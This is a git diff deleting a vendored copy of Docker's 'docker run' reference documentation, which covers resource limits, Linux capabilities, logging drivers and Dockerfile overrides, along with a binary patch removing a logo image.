-This example restricts the processes in the container to only use memory from
-memory nodes 0, 1 and 2.
-
-### CPU quota constraint
-
-The `--cpu-quota` flag limits the container's CPU usage. The default 0 value
-allows the container to take 100% of a CPU resource (1 CPU). The CFS (Completely Fair
-Scheduler) handles resource allocation for executing processes and is default
-Linux Scheduler used by the kernel. Set this value to 50000 to limit the container
-to 50% of a CPU resource. For multiple CPUs, adjust the `--cpu-quota` as necessary.
-For more information, see the [CFS documentation on bandwidth limiting](https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt).
-
-### Block IO bandwidth (Blkio) constraint
-
-By default, all containers get the same proportion of block IO bandwidth
-(blkio). This proportion is 500. To modify this proportion, change the
-container's blkio weight relative to the weighting of all other running
-containers using the `--blkio-weight` flag.
-
-> **Note:** The blkio weight setting is only available for direct IO. Buffered IO
-> is not currently supported.
-
-The `--blkio-weight` flag can set the weighting to a value between 10 to 1000.
-For example, the commands below create two containers with different blkio
-weight:
-
-    $ docker run -it --name c1 --blkio-weight 300 ubuntu:14.04 /bin/bash
-    $ docker run -it --name c2 --blkio-weight 600 ubuntu:14.04 /bin/bash
-
-If you do block IO in the two containers at the same time, by, for example:
-
-    $ time dd if=/mnt/zerofile of=test.out bs=1M count=1024 oflag=direct
-
-You'll find that the proportion of time is the same as the proportion of blkio
-weights of the two containers.
-
-The `--blkio-weight-device="DEVICE_NAME:WEIGHT"` flag sets a specific device weight.
-The `DEVICE_NAME:WEIGHT` is a string containing a colon-separated device name and weight.
-For example, to set `/dev/sda` device weight to `200`:
-
-    $ docker run -it \
-        --blkio-weight-device "/dev/sda:200" \
-        ubuntu
-
-If you specify both the `--blkio-weight` and `--blkio-weight-device`, Docker
-uses the `--blkio-weight` as the default weight and uses `--blkio-weight-device`
-to override this default with a new value on a specific device.
-The following example uses a default weight of `300` and overrides this default
-on `/dev/sda` setting that weight to `200`:
-
-    $ docker run -it \
-        --blkio-weight 300 \
-        --blkio-weight-device "/dev/sda:200" \
-        ubuntu
-
-The `--device-read-bps` flag limits the read rate (bytes per second) from a device.
-For example, this command creates a container and limits the read rate to `1mb`
-per second from `/dev/sda`:
-
-    $ docker run -it --device-read-bps /dev/sda:1mb ubuntu
-
-The `--device-write-bps` flag limits the write rate (bytes per second)to a device.
-For example, this command creates a container and limits the write rate to `1mb`
-per second for `/dev/sda`:
-
-    $ docker run -it --device-write-bps /dev/sda:1mb ubuntu
-
-Both flags take limits in the `<device-path>:<limit>[unit]` format. Both read
-and write rates must be a positive integer. You can specify the rate in `kb`
-(kilobytes), `mb` (megabytes), or `gb` (gigabytes).
-
-The `--device-read-iops` flag limits read rate (IO per second) from a device.
-For example, this command creates a container and limits the read rate to
-`1000` IO per second from `/dev/sda`:
-
-    $ docker run -ti --device-read-iops /dev/sda:1000 ubuntu
-
-The `--device-write-iops` flag limits write rate (IO per second) to a device.
-For example, this command creates a container and limits the write rate to
-`1000` IO per second to `/dev/sda`:
-
-    $ docker run -ti --device-write-iops /dev/sda:1000 ubuntu
-
-Both flags take limits in the `<device-path>:<limit>` format. Both read and
-write rates must be a positive integer.
-
-## Additional groups
-    --group-add: Add additional groups to run as
-
-By default, the docker container process runs with the supplementary groups looked
-up for the specified user. If one wants to add more to that list of groups, then
-one can use this flag:
-
-    $ docker run --rm --group-add audio --group-add nogroup --group-add 777 busybox id
-    uid=0(root) gid=0(root) groups=10(wheel),29(audio),99(nogroup),777
-
-## Runtime privilege and Linux capabilities
-
-    --cap-add: Add Linux capabilities
-    --cap-drop: Drop Linux capabilities
-    --privileged=false: Give extended privileges to this container
-    --device=[]: Allows you to run devices inside the container without the --privileged flag.
-
-By default, Docker containers are "unprivileged" and cannot, for
-example, run a Docker daemon inside a Docker container. This is because
-by default a container is not allowed to access any devices, but a
-"privileged" container is given access to all devices (see
-the documentation on [cgroups devices](https://www.kernel.org/doc/Documentation/cgroup-v1/devices.txt)).
-
-When the operator executes `docker run --privileged`, Docker will enable
-to access to all devices on the host as well as set some configuration
-in AppArmor or SELinux to allow the container nearly all the same access to the
-host as processes running outside containers on the host. Additional
-information about running with `--privileged` is available on the
-[Docker Blog](http://blog.docker.com/2013/09/docker-can-now-run-within-docker/).
-
-If you want to limit access to a specific device or devices you can use
-the `--device` flag. It allows you to specify one or more devices that
-will be accessible within the container.
-
-    $ docker run --device=/dev/snd:/dev/snd ...
-
-By default, the container will be able to `read`, `write`, and `mknod` these devices.
-This can be overridden using a third `:rwm` set of options to each `--device` flag:
-
-    $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk  /dev/xvdc
-
-    Command (m for help): q
-    $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk  /dev/xvdc
-    You will not be able to write the partition table.
-
-    Command (m for help): q
-
-    $ docker run --device=/dev/sda:/dev/xvdc:w --rm -it ubuntu fdisk  /dev/xvdc
-        crash....
-
-    $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk  /dev/xvdc
-    fdisk: unable to open /dev/xvdc: Operation not permitted
-
-In addition to `--privileged`, the operator can have fine grain control over the
-capabilities using `--cap-add` and `--cap-drop`. By default, Docker has a default
-list of capabilities that are kept. The following table lists the Linux capability
-options which are allowed by default and can be dropped.
-
-| Capability Key   | Capability Description                                                                                                        |
-| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- |
-| SETPCAP          | Modify process capabilities.                                                                                                  |
-| MKNOD            | Create special files using mknod(2).                                                                                          |
-| AUDIT_WRITE      | Write records to kernel auditing log.                                                                                         |
-| CHOWN            | Make arbitrary changes to file UIDs and GIDs (see chown(2)).                                                                  |
-| NET_RAW          | Use RAW and PACKET sockets.                                                                                                   |
-| DAC_OVERRIDE     | Bypass file read, write, and execute permission checks.                                                                       |
-| FOWNER           | Bypass permission checks on operations that normally require the file system UID of the process to match the UID of the file. |
-| FSETID           | Don't clear set-user-ID and set-group-ID permission bits when a file is modified.                                             |
-| KILL             | Bypass permission checks for sending signals.                                                                                 |
-| SETGID           | Make arbitrary manipulations of process GIDs and supplementary GID list.                                                      |
-| SETUID           | Make arbitrary manipulations of process UIDs.                                                                                 |
-| NET_BIND_SERVICE | Bind a socket to internet domain privileged ports (port numbers less than 1024).                                              |
-| SYS_CHROOT       | Use chroot(2), change root directory.                                                                                         |
-| SETFCAP          | Set file capabilities.                                                                                                        |
-
-The next table shows the capabilities which are not granted by default and may be added.
-
-| Capability Key   | Capability Description                                                                                                        |
-| ---------------- | ----------------------------------------------------------------------------------------------------------------------------- |
-| SYS_MODULE       | Load and unload kernel modules.                                                                                               |
-| SYS_RAWIO        | Perform I/O port operations (iopl(2) and ioperm(2)).                                                                          |
-| SYS_PACCT        | Use acct(2), switch process accounting on or off.                                                                             |
-| SYS_ADMIN        | Perform a range of system administration operations.                                                                          |
-| SYS_NICE         | Raise process nice value (nice(2), setpriority(2)) and change the nice value for arbitrary processes.                         |
-| SYS_RESOURCE     | Override resource Limits.                                                                                                     |
-| SYS_TIME         | Set system clock (settimeofday(2), stime(2), adjtimex(2)); set real-time (hardware) clock.                                    |
-| SYS_TTY_CONFIG   | Use vhangup(2); employ various privileged ioctl(2) operations on virtual terminals.                                           |
-| AUDIT_CONTROL    | Enable and disable kernel auditing; change auditing filter rules; retrieve auditing status and filtering rules.               |
-| MAC_OVERRIDE     | Allow MAC configuration or state changes. Implemented for the Smack LSM.                                                      |
-| MAC_ADMIN        | Override Mandatory Access Control (MAC). Implemented for the Smack Linux Security Module (LSM).                               |
-| NET_ADMIN        | Perform various network-related operations.                                                                                   |
-| SYSLOG           | Perform privileged syslog(2) operations.                                                                                      |
-| DAC_READ_SEARCH  | Bypass file read permission checks and directory read and execute permission checks.                                          |
-| LINUX_IMMUTABLE  | Set the FS_APPEND_FL and FS_IMMUTABLE_FL i-node flags.                                                                        |
-| NET_BROADCAST    | Make socket broadcasts, and listen to multicasts.                                                                             |
-| IPC_LOCK         | Lock memory (mlock(2), mlockall(2), mmap(2), shmctl(2)).                                                                      |
-| IPC_OWNER        | Bypass permission checks for operations on System V IPC objects.                                                              |
-| SYS_PTRACE       | Trace arbitrary processes using ptrace(2).                                                                                    |
-| SYS_BOOT         | Use reboot(2) and kexec_load(2), reboot and load a new kernel for later execution.                                            |
-| LEASE            | Establish leases on arbitrary files (see fcntl(2)).                                                                           |
-| WAKE_ALARM       | Trigger something that will wake up the system.                                                                               |
-| BLOCK_SUSPEND    | Employ features that can block system suspend.                                                                                |
-
-Further reference information is available on the [capabilities(7) - Linux man page](http://man7.org/linux/man-pages/man7/capabilities.7.html)
-
-Both flags support the value `ALL`, so if the
-operator wants to have all capabilities but `MKNOD` they could use:
-
-    $ docker run --cap-add=ALL --cap-drop=MKNOD ...
-
-For interacting with the network stack, instead of using `--privileged` they
-should use `--cap-add=NET_ADMIN` to modify the network interfaces.
-
-    $ docker run -it --rm  ubuntu:14.04 ip link add dummy0 type dummy
-    RTNETLINK answers: Operation not permitted
-    $ docker run -it --rm --cap-add=NET_ADMIN ubuntu:14.04 ip link add dummy0 type dummy
-
-To mount a FUSE based filesystem, you need to combine both `--cap-add` and
-`--device`:
-
-    $ docker run --rm -it --cap-add SYS_ADMIN sshfs sshfs sven@10.10.10.20:/home/sven /mnt
-    fuse: failed to open /dev/fuse: Operation not permitted
-    $ docker run --rm -it --device /dev/fuse sshfs sshfs sven@10.10.10.20:/home/sven /mnt
-    fusermount: mount failed: Operation not permitted
-    $ docker run --rm -it --cap-add SYS_ADMIN --device /dev/fuse sshfs
-    # sshfs sven@10.10.10.20:/home/sven /mnt
-    The authenticity of host '10.10.10.20 (10.10.10.20)' can't be established.
-    ECDSA key fingerprint is 25:34:85:75:25:b0:17:46:05:19:04:93:b5:dd:5f:c6.
-    Are you sure you want to continue connecting (yes/no)? yes
-    sven@10.10.10.20's password:
-    root@30aa0cfaf1b5:/# ls -la /mnt/src/docker
-    total 1516
-    drwxrwxr-x 1 1000 1000   4096 Dec  4 06:08 .
-    drwxrwxr-x 1 1000 1000   4096 Dec  4 11:46 ..
-    -rw-rw-r-- 1 1000 1000     16 Oct  8 00:09 .dockerignore
-    -rwxrwxr-x 1 1000 1000    464 Oct  8 00:09 .drone.yml
-    drwxrwxr-x 1 1000 1000   4096 Dec  4 06:11 .git
-    -rw-rw-r-- 1 1000 1000    461 Dec  4 06:08 .gitignore
-    ....
-
-The default seccomp profile will adjust to the selected capabilities, in order to allow
-use of facilities allowed by the capabilities, so you should not have to adjust this,
-since Docker 1.12. In Docker 1.10 and 1.11 this did not happen and it may be necessary
-to use a custom seccomp profile or use `--security-opt seccomp=unconfined` when adding
-capabilities.
-
-## Logging drivers (--log-driver)
-
-The container can have a different logging driver than the Docker daemon. Use
-the `--log-driver=VALUE` with the `docker run` command to configure the
-container's logging driver. The following options are supported:
-
-| Driver      | Description                                                                                                                   |
-| ----------- | ----------------------------------------------------------------------------------------------------------------------------- |
-| `none`      | Disables any logging for the container. `docker logs` won't be available with this driver.                                    |
-| `json-file` | Default logging driver for Docker. Writes JSON messages to file.  No logging options are supported for this driver.           |
-| `syslog`    | Syslog logging driver for Docker. Writes log messages to syslog.                                                              |
-| `journald`  | Journald logging driver for Docker. Writes log messages to `journald`.                                                        |
-| `gelf`      | Graylog Extended Log Format (GELF) logging driver for Docker. Writes log messages to a GELF endpoint likeGraylog or Logstash. |
-| `fluentd`   | Fluentd logging driver for Docker. Writes log messages to `fluentd` (forward input).                                          |
-| `awslogs`   | Amazon CloudWatch Logs logging driver for Docker. Writes log messages to Amazon CloudWatch Logs                               |
-| `splunk`    | Splunk logging driver for Docker. Writes log messages to `splunk` using Event Http Collector.                                 |
-
-The `docker logs` command is available only for the `json-file` and `journald`
-logging drivers.  For detailed information on working with logging drivers, see
-[Configure a logging driver](https://docs.docker.com/engine/admin/logging/overview/).
-
-
-## Overriding Dockerfile image defaults
-
-When a developer builds an image from a [*Dockerfile*](builder.md)
-or when she commits it, the developer can set a number of default parameters
-that take effect when the image starts up as a container.
-
-Four of the Dockerfile commands cannot be overridden at runtime: `FROM`,
-`MAINTAINER`, `RUN`, and `ADD`. Everything else has a corresponding override
-in `docker run`. We'll go through what the developer might have set in each
-Dockerfile instruction and how the operator can override that setting.
-
- - [CMD (Default Command or Options)](#cmd-default-command-or-options)
- - [ENTRYPOINT (Default Command to Execute at Runtime)](
-    #entrypoint-default-command-to-execute-at-runtime)
- - [EXPOSE (Incoming Ports)](#expose-incoming-ports)
- - [ENV (Environment Variables)](#env-environment-variables)
- - [HEALTHCHECK](#healthcheck)
- - [VOLUME (Shared Filesystems)](#volume-shared-filesystems)
- - [USER](#user)
- - [WORKDIR](#workdir)
-
-### CMD (default command or options)
-
-Recall the optional `COMMAND` in the Docker
-commandline:
-
-    $ docker run [OPTIONS] IMAGE[:TAG|@DIGEST] [COMMAND] [ARG...]
-
-This command is optional because the person who created the `IMAGE` may
-have already provided a default `COMMAND` using the Dockerfile `CMD`
-instruction. As the operator (the person running a container from the
-image), you can override that `CMD` instruction just by specifying a new
-`COMMAND`.
-
-If the image also specifies an `ENTRYPOINT` then the `CMD` or `COMMAND`
-get appended as arguments to the `ENTRYPOINT`.
-
-### ENTRYPOINT (default command to execute at runtime)
-
-    --entrypoint="": Overwrite the default entrypoint set by the image
-
-The `ENTRYPOINT` of an image is similar to a `COMMAND` because it
-specifies what executable to run when the container starts, but it is
-(purposely) more difficult to override. The `ENTRYPOINT` gives a
-container its default nature or behavior, so that when you set an
-`ENTRYPOINT` you can run the container *as if it were that binary*,
-complete with default options, and you can pass in more options via the
-`COMMAND`. But, sometimes an operator may want to run something else
-inside the container, so you can override the default `ENTRYPOINT` at
-runtime by using a string to specify the new `ENTRYPOINT`. Here is an
-example of how to run a shell in a container that has been set up to
-automatically run something else (like `/usr/bin/redis-server`):
-
-    $ docker run -it --entrypoint /bin/bash example/redis
-
-or two examples of how to pass more parameters to that ENTRYPOINT:
-
-    $ docker run -it --entrypoint /bin/bash example/redis -c ls -l
-    $ docker run -it --entrypoint /usr/bin/redis-cli example/redis --help
-
-You can reset a containers entrypoint by passing an empty string, for example:
-
-    $ docker run -it --entrypoint="" mysql bash
-
-> **Note**: Passing `--entrypoint` will clear out any default command set on the
-> image (i.e. any `CMD` instruction in the Dockerfile used to build it).
-
-### EXPOSE (incoming ports)
-
-The following `run` command options work with container networking:
-
-    --expose=[]: Expose a port or a range of ports inside the container.
-                 These are additional to those exposed by the `EXPOSE` instruction
-    -P         : Publish all exposed ports to the host interfaces
-    -p=[]      : Publish a container᾿s port or a range of ports to the host
-                   format: ip:hostPort:containerPort | ip::containerPort | hostPort:containerPort | containerPort
-                   Both hostPort and containerPort can be specified as a
-                   range of ports. When specifying ranges for both, the
-                   number of container ports in the range must match the
-                   number of host ports in the range, for example:
-                       -p 1234-1236:1234-1236/tcp
-
-                   When specifying a range for hostPort only, the
-                   containerPort must not be a range.  In this case the
-                   container port is published somewhere within the
-                   specified hostPort range. (e.g., `-p 1234-1236:1234/tcp`)
-
-                   (use 'docker port' to see the actual mapping)
-
-    --link=""  : Add link to another container (<name or id>:alias or <name or id>)
-
-With the exception of the `EXPOSE` directive, an image developer hasn't
-got much control over networking. The `EXPOSE` instruction defines the
-initial incoming ports that provide services. These ports are available
-to processes inside the container. An operator can use the `--expose`
-option to add to the exposed ports.
-
-To expose a container's internal port, an operator can start the
-container with the `-P` or `-p` flag. The exposed port is accessible on
-the host and the ports are available to any client that can reach the
-host.
-
-The `-P` option publishes all the ports to the host interfaces. Docker
-binds each exposed port to a random port on the host. The range of
-ports are within an *ephemeral port range* defined by
-`/proc/sys/net/ipv4/ip_local_port_range`. Use the `-p` flag to
-explicitly map a single port or range of ports.
-
-The port number inside the container (where the service listens) does
-not need to match the port number exposed on the outside of the
-container (where clients connect). For example, inside the container an
-HTTP service is listening on port 80 (and so the image developer
-specifies `EXPOSE 80` in the Dockerfile). At runtime, the port might be
-bound to 42800 on the host. To find the mapping between the host ports
-and the exposed ports, use `docker port`.
-
-If the operator uses `--link` when starting a new client container in the
-default bridge network, then the client container can access the exposed
-port via a private networking interface.
-If `--link` is used when starting a container in a user-defined network as
-described in [*Docker network overview*](https://docs.docker.com/engine/userguide/networking/),
-it will provide a named alias for the container being linked to.
-
-### ENV (environment variables)
-
-When a new container is created, Docker will set the following environment
-variables automatically:
-
-| Variable | Value |
-| -------- | ----- |
-| `HOME` | Set based on the value of `USER` |
-| `HOSTNAME` | The hostname associated with the container |
-| `PATH` | Includes popular directories, such as `:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin` |
-| `TERM` | `xterm` if the container is allocated a pseudo-TTY |
-
-Additionally, the operator can **set any environment variable** in the
-container by using one or more `-e` flags, even overriding those mentioned
-above, or already defined by the developer with a Dockerfile `ENV`:
-
-    $ docker run -e "deep=purple" --rm ubuntu /bin/bash -c export
-    declare -x HOME="/"
-    declare -x HOSTNAME="85bc26a0e200"
-    declare -x OLDPWD
-    declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
-    declare -x PWD="/"
-    declare -x SHLVL="1"
-    declare -x deep="purple"
-
-Similarly the operator can set the **hostname** with `-h`.
-
-### HEALTHCHECK
-
-```
-  --health-cmd            Command to run to check health
-  --health-interval       Time between running the check
-  --health-retries        Consecutive failures needed to report unhealthy
-  --health-timeout        Maximum time to allow one check to run
-  --no-healthcheck        Disable any container-specified HEALTHCHECK
-```
-
-Example:
-
-    {% raw %}
-    $ docker run --name=test -d \
-        --health-cmd='stat /etc/passwd || exit 1' \
-        --health-interval=2s \
-        busybox sleep 1d
-    $ sleep 2; docker inspect --format='{{.State.Health.Status}}' test
-    healthy
-    $ docker exec test rm /etc/passwd
-    $ sleep 2; docker inspect --format='{{json .State.Health}}' test
-    {
-      "Status": "unhealthy",
-      "FailingStreak": 3,
-      "Log": [
-        {
-          "Start": "2016-05-25T17:22:04.635478668Z",
-          "End": "2016-05-25T17:22:04.7272552Z",
-          "ExitCode": 0,
-          "Output": "  File: /etc/passwd\n  Size: 334       \tBlocks: 8          IO Block: 4096   regular file\nDevice: 32h/50d\tInode: 12          Links: 1\nAccess: (0664/-rw-rw-r--)  Uid: (    0/    root)   Gid: (    0/    root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..."
-        },
-        {
-          "Start": "2016-05-25T17:22:06.732900633Z",
-          "End": "2016-05-25T17:22:06.822168935Z",
-          "ExitCode": 0,
-          "Output": "  File: /etc/passwd\n  Size: 334       \tBlocks: 8          IO Block: 4096   regular file\nDevice: 32h/50d\tInode: 12          Links: 1\nAccess: (0664/-rw-rw-r--)  Uid: (    0/    root)   Gid: (    0/    root)\nAccess: 2015-12-05 22:05:32.000000000\nModify: 2015..."
-        },
-        {
-          "Start": "2016-05-25T17:22:08.823956535Z",
-          "End": "2016-05-25T17:22:08.897359124Z",
-          "ExitCode": 1,
-          "Output": "stat: can't stat '/etc/passwd': No such file or directory\n"
-        },
-        {
-          "Start": "2016-05-25T17:22:10.898802931Z",
-          "End": "2016-05-25T17:22:10.969631866Z",
-          "ExitCode": 1,
-          "Output": "stat: can't stat '/etc/passwd': No such file or directory\n"
-        },
-        {
-          "Start": "2016-05-25T17:22:12.971033523Z",
-          "End": "2016-05-25T17:22:13.082015516Z",
-          "ExitCode": 1,
-          "Output": "stat: can't stat '/etc/passwd': No such file or directory\n"
-        }
-      ]
-    }
-    {% endraw %}
-
-The health status is also displayed in the `docker ps` output.
-
-### TMPFS (mount tmpfs filesystems)
-
-```bash
---tmpfs=[]: Create a tmpfs mount with: container-dir[:<options>],
-            where the options are identical to the Linux
-            'mount -t tmpfs -o' command.
-```
-
-The example below mounts an empty tmpfs into the container with the `rw`,
-`noexec`, `nosuid`, and `size=65536k` options.
-
-    $ docker run -d --tmpfs /run:rw,noexec,nosuid,size=65536k my_image
-
-### VOLUME (shared filesystems)
-
-    -v, --volume=[host-src:]container-dest[:<options>]: Bind mount a volume.
-    The comma-delimited `options` are [rw|ro], [z|Z],
-    [[r]shared|[r]slave|[r]private], and [nocopy].
-    The 'host-src' is an absolute path or a name value.
-
-    If neither 'rw' or 'ro' is specified then the volume is mounted in
-    read-write mode.
-
-    The `nocopy` modes is used to disable automatic copying requested volume
-    path in the container to the volume storage location.
-    For named volumes, `copy` is the default mode. Copy modes are not supported
-    for bind-mounted volumes.
-
-    --volumes-from="": Mount all volumes from the given container(s)
-
-> **Note**:
-> When using systemd to manage the Docker daemon's start and stop, in the systemd
-> unit file there is an option to control mount propagation for the Docker daemon
-> itself, called `MountFlags`. The value of this setting may cause Docker to not
-> see mount propagation changes made on the mount point. For example, if this value
-> is `slave`, you may not be able to use the `shared` or `rshared` propagation on
-> a volume.
-
-The volumes commands are complex enough to have their own documentation
-in section [*Manage data in
-containers*](https://docs.docker.com/engine/tutorials/dockervolumes/). A developer can define
-one or more `VOLUME`'s associated with an image, but only the operator
-can give access from one container to another (or from a container to a
-volume mounted on the host).
-
-The `container-dest` must always be an absolute path such as `/src/docs`.
-The `host-src` can either be an absolute path or a `name` value. If you
-supply an absolute path for the `host-dir`, Docker bind-mounts to the path
-you specify. If you supply a `name`, Docker creates a named volume by that `name`.
-
-A `name` value must start with an alphanumeric character,
-followed by `a-z0-9`, `_` (underscore), `.` (period) or `-` (hyphen).
-An absolute path starts with a `/` (forward slash).
-
-For example, you can specify either `/foo` or `foo` for a `host-src` value.
-If you supply the `/foo` value, Docker creates a bind-mount. If you supply
-the `foo` specification, Docker creates a named volume.
-
-### USER
-
-`root` (id = 0) is the default user within a container. The image developer can
-create additional users. Those users are accessible by name.  When passing a numeric
-ID, the user does not have to exist in the container.
-
-The developer can set a default user to run the first process with the
-Dockerfile `USER` instruction. When starting a container, the operator can override
-the `USER` instruction by passing the `-u` option.
-
-    -u="", --user="": Sets the username or UID used and optionally the groupname or GID for the specified command.
-
-    The followings examples are all valid:
-    --user=[ user | user:group | uid | uid:gid | user:gid | uid:group ]
-
-> **Note:** if you pass a numeric uid, it must be in the range of 0-2147483647.
-
-### WORKDIR
-
-The default working directory for running binaries within a container is the
-root directory (`/`), but the developer can set a different default with the
-Dockerfile `WORKDIR` command. The operator can override this with:
-
-    -w="": Working directory inside the container
diff --git a/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png b/vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png
deleted file mode 100644
index 717d09d773cc46ff8297d06f66d9aa855453f35a..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 4972
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
